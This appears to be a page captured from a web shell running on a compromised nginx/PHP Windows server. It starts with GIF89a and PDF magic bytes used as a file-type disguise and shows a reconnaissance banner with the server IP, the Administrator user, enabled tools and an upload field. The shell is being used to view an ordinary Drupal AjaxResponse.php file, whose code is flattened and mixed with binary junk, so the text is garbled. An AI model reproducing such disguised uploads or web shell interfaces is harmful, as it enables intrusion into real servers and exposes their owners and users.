GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/lib/Drupal/Core/Ajax/ |
Upload File : |
<?php namespace Drupal\Core\Ajax; use Drupal\Core\Render\BubbleableMetadata; use Drupal\Core\Render\AttachmentsInterface; use Drupal\Core\Render\AttachmentsTrait; use Symfony\Component\HttpFoundation\JsonResponse; /** * JSON response object for AJAX requests. * * @ingroup ajax */ class AjaxResponse extends JsonResponse implements AttachmentsInterface { use AttachmentsTrait; /** * The array of ajax commands. * * @var array */ protected $commands = []; /** * Add an AJAX command to the response. * * @param \Drupal\Core\Ajax\CommandInterface $command * An AJAX command object implementing CommandInterface. * @param bool $prepend * A boolean which determines whether the new command should be executed * before previously added commands. Defaults to FALSE. * * @return AjaxResponse * The current AjaxResponse. */ public function addCommand(CommandInterface $command, $prepend = FALSE) { if ($prepend) { array_unshift($this->commands, $command->render()); } else { $this->commands[] = $command->render(); } if ($command instanceof CommandWithAttachedAssetsInterface) { $assets = $command->getAttachedAssets(); $attachments = [ 'library' => $assets->getLibraries(), 'drupalSettings' => $assets->getSettings(), ]; $attachments = BubbleableMetadata::mergeAttachments($this->getAttachments(), $attachments); $this->setAttachments($attachments); } return $this; } /** * Gets all AJAX commands. * * @return \Drupal\Core\Ajax\CommandInterface[] * Returns all previously added AJAX commands. */ public function &getCommands() { return $this->commands; } }